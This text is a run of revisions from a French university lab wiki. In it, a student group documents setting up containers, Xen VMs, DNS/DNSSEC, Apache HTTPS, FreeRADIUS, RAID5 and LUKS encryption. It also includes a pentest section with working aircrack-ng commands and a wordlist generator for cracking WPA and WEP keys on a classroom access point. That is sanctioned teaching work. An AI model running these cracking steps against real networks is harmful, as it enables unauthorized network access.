$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
<br />
<br />
[[Fichier:cassagewep07.png|600px|center]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]<br />
<br />
===6.2 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créons ensuite un fichier texte. La suite de cette partie, qui est d'échanger les cartes SD, n'est pas réalisable dans notre cas.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=49134TP sysres IMA5sc 2018/2019 G72018-12-21T18:10:32Z<p>Mcreteur : /* 5.3 Crackage de clé WPA */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
*'''Montage des 3 partitions :'''<br />
mount -oloop /disk1 /mnt/dsk1<br />
mount -oloop /disk2 /mnt/dsk2<br />
mount -oloop /disk3 /mnt/dsk3<br />
<br />
*'''Création du processus isolé par unshare''':<br />
unshare -p -f -m -n -u chroot /mnt/dsk1 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk2 /bin/sh -c "mount /proc ; /bin/bash"<br />
unshare -p -f -m -n -u chroot /mnt/dsk3 /bin/sh -c "mount /proc ; /bin/bash"<br />
<br />
===Configuration réseau===<br />
*'''Création d'un commutateur logiciel''':<br />
ip link add mehcret2 type bridge<br />
<br />
*'''Création des interfaces virtuelles:'''<br />
ip link add vif1 type veth peer name eth0@vif1<br />
ip link add vif2 type veth peer name eth0@vif2<br />
ip link add vif3 type veth peer name eth0@vif3<br />
ip link add vif4 type veth peer name eth1@vif4<br />
<br />
*'''Ajout d'interfaces dans le commutateur :'''<br />
ip link set vif1 master mehcret2<br />
ip link set vif2 master mehcret2<br />
ip link set vif3 master mehcret2<br />
ip link set vif4 master bridge<br />
<br />
*'''Activation des interfaces''':<br />
ip link set eth0 up<br />
ip link set eth1 up<br />
<br />
*'''Récupération du PID des conteneurs :'''<br />
ps auxwww | grep unshare<br />
<br />
*'''Ajout des interfaces dans les conteneurs :'''<br />
ip link set eth0@vif2 netns /proc/19382/ns/net name eth0 (dsk1)<br />
ip link set eth0@vif1 netns /proc/19377/ns/net name eth0 (dsk2)<br />
ip link set eth1@vif4 netns /proc/19377/ns/net name eth1 (dsk2)<br />
ip link set eth0@vif3 netns /proc/19396/ns/net name eth0 (dsk3)<br />
<br />
*'''Activation du pont:''' <br />
ip address add dev mehcret2 192.168.60.0/24<br />
<br />
*'''Attribution des adresses:'''<br />
ip address add dev eth0 192.168.60.51/24 (dsk1)<br />
ip address add dev eth0 192.168.60.52/24 (dsk2)<br />
ip address add dev eth0 192.168.60.53/24 (dsk3)<br />
ip address add dev eth1 172.26.145.67/24 (dsk2)<br />
ip route add default via 172.26.145.254 (dsk2)<br />
<br />
*'''Activation :'''<br />
ip link set eth0 up<br />
ip link set vif1 up<br />
ip link set vif2 up<br />
ip link set vif3 up<br />
ip link set vif4 up<br />
ip link set mehcret2 up<br />
<br />
On peut désormais pinger entre les différents conteneurs.<br />
<br />
===Configuration des serveurs Web===<br />
<br />
Nous devons maintenant mettre en place les serveurs apache.<br />
<br />
Dans un premier temps, on créé les sous-domaines dont nous avons besoin. Dans les enregistrements DNS du domaine '''plil.space''', on ajoute les enregistrements suivants : <br />
<br />
- mndtMehcret A 172.26.145.67 (mndtMehcret sera le serveur mandataire. On le fait pointer sur l'adresse eth1 du conteneur 2)<br />
<br />
- web1Mehcret CNAME mndtMehcret (Serveur web du conteneur 1)<br />
<br />
- web2Mehcret CNAME mndtMhecret (Serveur web du conteneur 3)<br />
<br />
On configure ensuite les serveurs Apache. On attribue au premier serveur sur le conteneur 1 la configuration suivante dans le répertoire /etc/apache2/sites-available/ :<br />
<br />
<VirtualHost *:80><br />
ServerName web1mehcret.plil.space<br />
Options Indexes FollowSymLinks<br />
DocumentRoot /var/www/html/web1mehcret/<br />
</VirtualHost> <br />
<br />
On fait de même dans le conteneur 3 pour le serveur 2 en mettant les ServerName et Document root associés.<br />
On écrit ensuite une page HTML basique dans les dossiers /var/www/html/web1mehcret/ et /var/www/html/web2mehcret/ afin de reconnaître notre serveur web. <br />
<br />
Il faut maintenant mettre en place le reverse proxy. <br />
Dans le conteneur 2, connectée à la fois à eth0 et eth1, nous mettons en place la configuration suivante :<br />
<br />
<VirtualHost *:80><br />
ServerName mndtMehcret.plil.space<br />
ProxyPass "/web1" "http://192.168.60.51/"<br />
ProxyPassReverse "/web1" "http://192.168.60.51/"<br />
ProxyPass "/web2" "http://"http://192.168.60.53/"<br />
ProxyPassReverse "/web2" "http://192.168.60.53/"<br />
</VirtualHost><br />
<br />
Les lignes ProxyPass et ProxyPassReverse permettent alors la redirection sur les serveurs web du conteneur 1 et 3.<br />
<br />
Après avoir configuré les différents serveurs Apache, il faut redémarrer les services sur chaque conteneur :<br />
<br />
$ service apache2 restart<br />
<br />
Pour utiliser apache en mode reverse proxy, on execute la commande :<br />
<br />
$ a2enmod proxy proxy_http<br />
<br />
11h25 : Serveurs Web unshare OK<br />
<br />
==Conteneurs Docker==<br />
<br />
Avant de lancer un conteneur, il faut modifier le fichier /etc/default/docker et commenter la ligne contenant iptables.<br />
Nous exécutons ensuite la commande :<br />
$ iptables-save<br />
Puis on redémarre le service Docker :<br />
$ service docker restart<br />
<br />
Sans les commandes réalisées précédemment, nous n'avions pas accès au réseau dans les conteneurs.<br />
<br />
Nous pouvons maintenant lancer un conteneur basé sur l'image officielle de debian :<br />
$ docker run -i -t debian<br />
<br />
Dans le conteneur, nous ajoutons le proxy de l'école :<br />
$ export http_proxy=http://proxy.polytech-lille.fr:3128/ <br />
<br />
Nous pouvons maintenant utiliser le gestionnaire de paquets apt afin d'installer apache2 et un éditeur de texte:<br />
$ apt-get update<br />
$ apt-get install apache2, nano, vim<br />
<br />
On sauvegarde ensuite le conteneur pour pouvoir le lancer plus tard en 3 exemplaires : <br />
<br />
$ docker commit [IDduConteneur] mehcret<br />
<br />
On créé un réseau Docker pour isoler nos conteneurs ensemble :<br />
<br />
$ docker network create --driver bridge mehcretnetwork<br />
<br />
Nous lançons ensuite 3 conteneurs sur le réseau précédemment créé en liant le port 80 du conteneur 3 (qui jouera le rôle de reverse proxy) au port 80 de la machine : <br />
<br />
$ docker run -i --network mehcretnetwork --name mehcret1 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret2 mehcret<br />
$ docker run -i --network mehcretnetwork --name mehcret3 -p 80:80 mehcret<br />
<br />
Nous créons un nouveau sous domaine, dockerMehcret.plil.space pointant sur l'adresse IP de notre bridge en ajoutant un enregistrement de type A.<br />
Finalement, on configure les différents serveurs Apache comme nous l'avions fait dans la partie précédente.<br />
<br />
<br />
10h30 Serveurs Web (docker) OK<br />
<br />
<br />
=TP PRA=<br />
<br />
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous aurons à installer une machine virtuelle Xen ainsi qu’à implanter un auto-commutateur téléphonique logiciel. Enfin la mise en place d’un réseau Wifi sécurisé et d’un site web sécurisé nous permettra de mettre en pratiques nos connaissances en la matière.<br />
<br />
==Tâche 5 : Câblage, connexion SR52, cordouan==<br />
<br />
===Connexion des routeurs au réseau de l'école===<br />
<br />
*'''Connexion SR52 - Routeur ISR4221 (E306)'''<br />
<br />
Dans le local SR52, on branche un câble du port 21 du routeur jusqu'au port K-16 du commutateur qui est relié à la prise murale qui se situe au dessus de cordouan en E306.<br />
<br />
Sur le routeur, on passe le port 21 sur le vlan 131 : <br />
<br />
config t<br />
int gi1/0/21<br />
switchport access vlan 131<br />
write<br />
<br />
En E306, on relie le port Gigabit 0/0/0 du routeur ISR4221 à la prise murale SR52.3-K16.<br />
<br />
Les LEDs passent alors au vert et on observe que le port 21 du routeur en SR52 est bien connecté :<br />
<br />
<br />
<gallery mode="nolines" widths=500px heights=400px><br />
<br />
File:TableVlansInterfacesSR52.jpg<br />
<br />
File:LedSR52.jpg<br />
<br />
<br />
</gallery><br />
<br />
*'''Connexion SR52 - Routeur Catalyst 3560 (E304)'''<br />
<br />
En E304, on remarque une fibre libre de code couleur Blanc-Noir, on retrouve cette même fibre connectée au routeur en SR52 sur une interface 10Gb et déjà configurée sur le bon Vlan. On branche alors cette fibre sur la première interface 10 Gb du routeur Catalyst 3560 en E304 en accord avec le groupe configurant ce routeur. Le routeur de la E304 est désormais connecté au réseau de l'école.<br />
<br />
<br />
===Connexion des commutateurs aux routeurs===<br />
<br />
*'''Connexion Routeur Catalyst 3560 - Commutateur 4006 (E304)'''<br />
<br />
Le routeur utilisé en E304 permettant la communication 10Gb, on relie le commutateur au routeur par 10 câbles afin de profiter au maximum des possibilités offertes par le Catalyst 3560. Le groupe s'occupant des commutateurs ayant configuré le commutateur de la E304 pour communiquer avec le routeur de cette même salle par les ports 4 à 13, on branche 10 câbles ethernet sur ces ports que l'on relie au routeur sur les ports 1 à 10.<br />
<br />
*'''Connexion Routeur ISR 4221 - Commutateur 6000 (E306)'''<br />
<br />
Contrairement au routeur utilisé en E304, le routeur en E306 ne permet une communication que Gb. Le commutateur sera donc relié au routeur par un seul câble. En accord avec le groupe configurant le routeur et celui configurant le commutateur, on relie ces derniers par un câble ethernet du port Gigabit 0/0/2 du routeur au port 14 du commutateur.<br />
<br />
*'''Connexion Routeur ISR 4221 (E306) - Commutateur 4006 (E304) '''<br />
<br />
La connexion entre le routeur et le commutateur doit se faire par fibre étant donné que ces deux appareils se trouvent dans deux salles différentes. On utilise pour cela la fibre disponible de code couleur (A COMPLETER). Du côté de la salle E306, on connecte la fibre à l'interface Gb 0/0/1. En E304, on connecte la fibre sur un port UPLINK du commutateur.<br />
<br />
*'''Connexion Commutateur 6000 (E306) - Routeur Catalyst 3560 (E304) '''<br />
<br />
La connexion au niveau du routeur ne pouvant se faire ici que par cuivre, nous devons utiliser un convertisseur fibre - cuivre. Pour interconnecter le commutateur 6000 au routeur Catalyst 3560, nous utilisons la fibre disponible de code couleur ORANGE. On connecte alors cette fibre sur le port (A COMPLETER) du commutateur de la E306. De l'autre côté, en E304, on connecte la fibre à un convertisseur puis le convertisseur au port 11 du routeur par un câble ethernet en accord avec le groupe configurant ce routeur.<br />
<br />
===Connexions au serveur Cordouan===<br />
<br />
Finalement, il faut connecter le serveur Cordouan à notre réseau afin d'avoir du réseau sur nos futures VM. <br />
<br />
*'''Connexion Commutateur 6000 (E306) - Serveur Cordouan '''<br />
<br />
Le commutateur 6000 se trouvant dans la même salle que le serveur Cordouan, on peut relier ces derniers par cuivre. On relie alors le port 17 au serveur Cordouan par câble ethernet.<br />
<br />
*'''Connexion Routeur Catalyst 3560 (E306) - Serveur Cordouan '''<br />
<br />
Ces deux appareils se trouvant dans deux salles différentes, la connexion ne peut se faire que par fibre. Cependant, nous ne disposons plus de convertisseur. Nous avons donc relié le serveur Cordouan au routeur de la E306 plutôt qu'au commutateur. Nous avons pour cela utilisé la fibre de code couleur BLEU. Nous connectons d'un côté la fibre au deuxième port Gigabit du routeur 3560, et de l'autre, la fibre au serveur Cordouan.<br />
<br />
===Connexion des commutateurs aux points d'accès===<br />
<br />
===Schéma résumant le câblage réalisé :===<br />
<br />
[[Fichier:ArchitectureMehCret.png|1200px]]<br />
<br />
== 2.Installation des systèmes d'exploitation==<br />
<br />
===Création de la machine virtuelle===<br />
<br />
Création d'une machine virtuelle sur cordouan.insecserv.deule.net :<br />
<br />
xen-create-image --hostname=hercule --ip=193.48.57.183 --netmask=255.255.255.224 --gateway=193.48.57.160 --dir=/usr/local/xen<br />
<br />
Il fois la machine créée, on ajoute le bridge dans la config hercule.cfg<br />
<br />
vif = ['ip=193.48.57.183 , mac=#####, bridge=StudentsInfo']<br />
xen create hercule.cfg<br />
<br />
On vérifie que la machine est bien créée en s'y connectant :<br />
<br />
xl console hercule<br />
<br />
Création des partitions logiques sur Cordouan pour la machine virtuelle :<br />
lvcreate -L 10G -n /dev/virtual/hercule-home -v<br />
lvcreate -L 10G -n /dev/virtual/hercule-var -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes : <br />
'phy:/dev/virtual/hercule-home,xvdb1,w',<br />
'phy:/dev/virtual/hercule-var,xvdb2,w'<br />
<br />
On relance la VM.<br />
On formate les disques créés sur la machine :<br />
mkfs -t ext4 /dev/xvdb1<br />
mkfs -t ext4 /dev/xvdb2<br />
<br />
Afin de lier le home de notre vm au disque créé précédemment, on modifie le fichier /etc/fstab en y ajoutant la ligne suivante :<br />
/dev/xvdb1 /home ext4 defaults 0 2<br />
Puis on effectue le montage :<br />
mount -a <br />
<br />
Pour le var, il faut monter temporairement le disque pour ne pas occulter le repertoire : <br />
mount /dev/xvdb2 /mnt<br />
<br />
On déplace ensuite le contenu de var dans le point de montage précédemment créé :<br />
mv /var/* /mnt<br />
<br />
Finalement, on ajoute dans le fichier /etc/fstab la ligne suivante pour effectuer le montage permanent :<br />
/dev/xvdb2 /var ext4 defaults 0 2<br />
<br />
On applique les modifications :<br />
mount -a<br />
<br />
==4.Services internet==<br />
<br />
<br />
===4.2 Serveur DNS===<br />
<br />
Achat du domaine hercule.pw sur gandi.<br />
<br />
Installation de bind9: <br />
<br />
apt install bind9 bind9-host dnsutils<br />
<br />
Modification de la configuration de bind9 :<br />
On créé un fichier de configuration de zone db.hercule.space dans /etc/bind/ avec le contenu suivant : <br />
<br />
;<br />
; BIND data file for local loopback interface<br />
;<br />
$TTL 604800<br />
@ IN SOA ns.hercule.space. root.hercule.space (<br />
3 ; Serial<br />
604800 ; Refresh<br />
86400 ; Retry<br />
2419200 ; Expire<br />
604800 ) ; Negative Cache TTL<br />
;<br />
IN NS ns.hercule.space.<br />
IN NS ns6.gandi.net<br />
@ IN A 193.48.57.183<br />
ns IN A 193.48.57.183<br />
www IN A 193.48.57.183<br />
<br />
Ajout de notre zone DNS en modifiant le fichier /etc/bind/named.conf.local :<br />
<br />
zone "hercule.space" {<br />
type master;<br />
file "/etc/bind/db.hercule.space"; <br />
allow-transfer {217.70.177.40;};<br />
};<br />
<br />
La ligne 'allow-transfer' précise les adresses des serveurs esclaves Gandi.<br />
<br />
Redémarrage du serveur bind9 :<br />
service bind9 restart<br />
<br />
Ajout de glue records sur Gandi pour permettre l'association du serveur DNS créé avec notre adresse IP : <br />
name : ns.hercule.space<br />
IP address : 193.48.57.183<br />
<br />
Changement du nameserver principal sur Gandi (A FAIRE): <br />
DNS 1 : ns.hercule.space<br />
<br />
On laisse ceux de Gandi pour les deux serveurs esclaves.<br />
<br />
<br />
===4.4 DNSSEC===<br />
<br />
Dans un premier temps, on active DNSSEC en ajoutant dans le fichier /etc/bind/named la ligne :<br />
dnssec-enable yes;<br />
<br />
Création d'un répertoire de nom hercule.space.dnssec pour y générer les clefs<br />
<br />
Création de la clef asymétrique de signature de clefs de zone :<br />
<br />
dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE hercule.space<br />
:<br />
Création de la clef asymétrique de la zone pour signer les enregistrements :<br />
<br />
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE hercule.space<br />
<br />
On renomme ces clef : <br />
hercule.space-ksk.key<br />
hercule.space-zsk.key<br />
<br />
Puis on les inclus dans le fichier /etc/bind/db.hercule.space<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-ksk.key<br />
$include /etc/bind/hercule.space.dnssec/hercule.space-zsk.key<br />
<br />
On signe les enregistrements de la zone :<br />
dnssec-signzone -o hercule.space -k hercule.space-ksk ../db.hercule.space hercule.space-zsk<br />
<br />
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe .signed :<br />
file "/etc/bind/db.hercule.space.signed";<br />
<br />
On communique les parties publiques de la KSK et ZSK à Gandi dans l'onglet DNSSEC. On n'oublie pas également d'incrémenter le SERIAL dans le fichier db.hercule.space.<br />
<br />
===4.3 Serveur Apache===<br />
<br />
<br />
Création du dossier /var/www/www.hercule.pw<br />
<br />
*''' Certification SSL :'''<br />
<br />
Génération du Certificate Signing Request (CSR) pour Gandi sur la VM :<br />
openssl req -nodes -newkey rsa:2048 -sha256 -keyout hercule.pw.key -out hercule.pw.csr<br />
<br />
On copie le contenu de la clé générée sur Gandi. Pour valider la certification SSL, on choisi la méthode par DNS Record. On ajoute alors l'enregistrement CNAME proposé par Gandi dans notre configuration de zone sur la VM. Il faut maintenant patienter le temps du traitement. <br />
<br />
*'''Configuration Apache :'''<br />
<br />
Configuration du serveur web dans le fichier /etc/apache2/sites-available/hercule.space.conf<br />
<br />
<VirtualHost 193.48.57.183:443><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_acces.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /etc/ssl/certs/www.hercule.space.crt<br />
SSLCertificateKeyFile /etc/ssl/private/hercule.space.key<br />
SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem<br />
SSLVerifyClient None<br />
</VirtualHost><br />
<br />
<VirtualHost 193.48.57.183:80><br />
ServerName www.hercule.space<br />
ServerAlias hercule.space<br />
Redirect / https://www.hercule.space<br />
</VirtualHost><br />
<br />
<br />
Modification du fichier ports.conf pour que le serveur web écoute sur le port 443 :<br />
<br />
Listen 80 443<br />
<br />
On active enfin le module SSL, notre site, et on redémarre le service apache :<br />
a2enmod ssl<br />
a2ensite hercule.space.conf<br />
service apache2 restart<br />
<br />
[[Fichier:Httpshercule.png|1000px|center]]<br />
<br />
===Serveur Freeradius===<br />
<br />
Installation de Freeradius sur la vm :<br />
apt-get install freeradius<br />
<br />
On ajoute ensuite un utilisateur au serveur freeradius. Pour cela, dans le fichier /etc/freeradius/3.0/users on ajoute : <br />
hercule Cleartext-Password := "glopglop"<br />
<br />
Il nous est demandé de configurer le serveur en PEAP-MSCHAPv2. Pour cela, on modifie les fichiers : <br />
<br />
- /etc/freeradius/3.0/mods-enabled/eap :<br />
default_eap_type = peap<br />
<br />
- /etc/freeradius/3.0/mods-enabled/mschap :<br />
use_mppe = yes<br />
require_encryption = yes<br />
require_strong = yes<br />
with_ntdomain_hack = yes<br />
<br />
<br />
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :<br />
client 192.168.0.10/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
client 192.168.0.11/32 <br />
{<br />
secret = secretIMA5SC<br />
shortname = borneDivinite<br />
}<br />
<br />
<br />
On met à jour la configuration : <br />
ldconfig<br />
<br />
Et enfin, nous lançons le service freeradius :<br />
$ service freeradius restart<br />
<br />
Nous passons ensuite à la modification de la configuration des points d'accès afin qu'ils prennent en compte notre serveur freeradius :<br />
<br />
enable<br />
<br />
conf t<br />
aaa new-model<br />
aaa authentication login eap_group17 group radius_group17<br />
aaa group server radius radius_group17<br />
server 193.48.57.183 auth-port 1812 acct-port 1813<br />
radius-server host 193.48.57.183 auth-port 1812 acct-port 1813 key secretIMA5SC<br />
end<br />
<br />
conf t<br />
dot11 ssid Hercule<br />
vlan 17<br />
authentication open eap eap_group17<br />
authentication network-eap eap_group17<br />
authentication key-management wpa<br />
Mbssid Guest-mode<br />
end<br />
<br />
conf t<br />
int dot11radio0<br />
Mbssid<br />
ssid Hercule<br />
encryption vlan 17 mode ciphers aes-ccm tkip<br />
end<br />
<br />
conf t<br />
int dot11radio0.17<br />
encapsulation dot1Q 17<br />
bridge-group 17<br />
end<br />
<br />
== 5. Tests d'intrusion ==<br />
===5.3 Crackage de clé WPA===<br />
<br />
Afin de lancer le crackage de clé WPA sur le point d'accès cracotte07, nous avons besoin du package aircrack-ng que nous installons. Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlp2s0<br />
<br />
Nous affichons ensuite tout les point d'accés environnants en utilisant la commande :<br />
<br />
$ airodump-ng wlp2s0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng -c 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlp2s0mon<br />
<br />
Une fois les fichiers générés, nous les transférons sur une ZABETH. Avant de lancer le craquage, nous devons générer un dictionnaire contenant toutes les combinaisons possibles de 8 chiffres. Pour cela, nous réalisons le script bash suivant :<br />
<br />
#!/bin/bash<br />
charset=({0..9})<br />
permute(){<br />
(($1 == 0)) && { echo "$2"; return; }<br />
for char in "${charset[@]}"<br />
do<br />
permute "$((${1} - 1 ))" "$2$char"<br />
done<br />
}<br />
permute "$1"<br />
<br />
Que nous laçons en exécutant :<br />
<br />
$ ./comb.sh 8 >> dictionnaire.txt<br />
<br />
Le crack est effectué en lançant la commande :<br />
<br />
$ aircrack-ng -a2 -b 04:DA:D2:9C:50:56 -w /path_to_file/dictionnaire.txt /path_to_file/*.cap<br />
<br />
Nous récupérons la clé après quelques heures de calcul :<br />
<br />
[[Fichier:Crack groupe7.png|600px|center]]<br />
<br />
===5.2 Cassage de clé WEP===<br />
<br />
<br />
Nous affichons ainsi nos interfaces avec la commande :<br />
<br />
$ iwconfig<br />
<br />
Nous lançons alors airmon-ng avec notre interface wifi pour la mettre en mode moniteur:<br />
<br />
$ airmon-ng start wlx40a5ef012c92<br />
<br />
Nous affichons ensuite tout les point d'accés environnants protégés en WEP en utilisant la commande :<br />
<br />
$ airodump-ng --encrypt wep wlan0mon<br />
<br />
Nous capturons des paquets provenants de cracotte07 que nous enregistrons dans un fichier :<br />
<br />
$ airodump-ng --channel 9 --bssid 04:DA:d2:9C:50:56 -w ./path_to_folder/cracotte07 wlan0mon<br />
<br />
En parallèle, on simule une connexion au point d'accès pour récupérer le handshake : <br />
$ aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:50:56 wlan0mon<br />
<br />
On réalise le cassage : <br />
$ aircrack-ng ./path_to_folder/cracotte07.cap<br />
<br />
<br />
<br />
[[Fichier:cassagewep07.png|600px]]<br />
<br />
== 6. Réalisation ==<br />
<br />
===6.1 Sécurisation de données===<br />
<br />
Création de trois partitions LVM de 1Go sur Cordouan : <br />
lvcreate -L 1G -n /dev/virtual/hercule1 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule2 -v<br />
lvcreate -L 1G -n /dev/virtual/hercule3 -v<br />
<br />
Modification du fichier de configuration de la machine virtuelle pour prendre en compte ces volumes créés. Ajout des lignes :<br />
<br />
'phy:/dev/virtual/hercule1,xvdc1,w',<br />
'phy:/dev/virtual/hercule2,xvdc2,w',<br />
'phy:/dev/virtual/hercule3,xvdc3,w'<br />
<br />
<br />
Installation du paquetage mdadm pour réaliser le RAID5 logiciel :<br />
apt-get install mdadm<br />
<br />
Création du RAID5 :<br />
mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdc1 /dev/xvdc2 /dev/xvdc3<br />
<br />
On formate le RAID créé : <br />
mkfs -t ext4 /dev/md0<br />
<br />
On monte le RAID dans notre VM : <br />
mount /dev/md0 /mnt <br />
<br />
On créé un fichier sur le RAID pour qu'il contienne des données. On ferme la VM et on lui retire la partition xvdc3 dans sa config.<br />
On relance la VM. Puis on essaye de remonter le RAID : <br />
En voulant remonter /dev/md0, un message nous indique que md0 n'existe pas. On lance alors la commande : <br />
cat /proc/mdstat<br />
Et on s'aperçoit que notre RAID est toujours présent, cette fois n'ayant plus que deux disques, mais apparaît sous le nom md127. On monte alors ce derrnier : <br />
mount /dev/md127 /mnt<br />
On retrouve alors bien le fichier créé initialement sur notre RAID. Lors de sa création, le fichier a été copié sur les 3 disques par le RAID. Ainsi, lorsque que nous avons supprimé un disque, cela n'a pas eu d'impact sur nos données.<br />
<br />
[[Fichier:Raidhercule.png|600px]]<br />
<br />
===6.2 Cryptage de données===<br />
<br />
Dans notre cas, nous n'utilisons pas une carte SD. Nous créons cependant une partition de 1 Giga sur cordouan sur laquelle on travaillera :<br />
<br />
$ lvcreate -L 1G -n /dev/virtual/hercule-crypt -v<br />
<br />
Une fois cette action réalisée, et la partition intégrée au fichier de configuration de la machine virtuelle sous forme de volume, de nom xvdd1, nous récupérons les paquets lvm2 et cryptsetup.<br />
Lorsque la récupération est terminée, nous sécurisons la partition de la manière suivante :<br />
<br />
$ cryptsetup luksFormat -c aes -h sha256 /dev/xvdd1<br />
<br />
Cette commande permet de formater la partiton au type LUKS et chiffre en AES avec un algorithme de hashage SHA256. Nous choisissons une phrase de chiffrement.<br />
<br />
Une fois la partition chiffrée, nous ouvrons un volume dans notre partition chiffrée :<br />
<br />
$ cryptsetup luksOpen /dev/xvdd1 home<br />
<br />
Nous la formatons en ext4 :<br />
<br />
$ mkfs -t ext4 /dev/mapper/home<br />
<br />
Enfin, nous montons la partition sous /mnt :<br />
<br />
$ mount -t ext4 /dev/mapper/home /mnt<br />
<br />
Nous y créons ensuite un fichier texte. La suite de cette partie, qui est d'échanger les cartes SD, n'est pas réalisable dans notre cas.</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G7&diff=49133TP sysres IMA5sc 2018/2019 G72018-12-21T18:09:54Z<p>Mcreteur : /* 4.3 Serveur Apache */</p>
<hr />
<div>= Wiki de TP =<br />
<br />
=TP GIS=<br />
<br />
==Conteneurs "à la main"==<br />
<br />
===Mise en place des conteneurs===<br />
<br />
*'''Création d'une partition''':<br />
dd if=/dev/zero of=/disk1 bs=1024K count=10240<br />
<br />
*'''Formatage''' : <br />
mtfs.etx4 /disk1<br />
<br />
*'''Montage de la partition''':<br />
mount /disk1 /mnt<br />
<br />
*'''Installation d'un système Debian''':<br />
debootstrap --include=apache2,nano stable /mnt <br />
<br />
*'''Préparation du montage du pseudo système de fichier /proc''':<br />
echo "proc /proc proc defaults 0 0" >> rootfs/etc/fstab<br />
<br />
*''' Démontage ''':<br />
umount /mnt<br />
<br />
*'''Copie en 2 exemplaires''':<br />
cp /disk1 /disk2<br />
cp /disk1 /disk3<br />
<br />
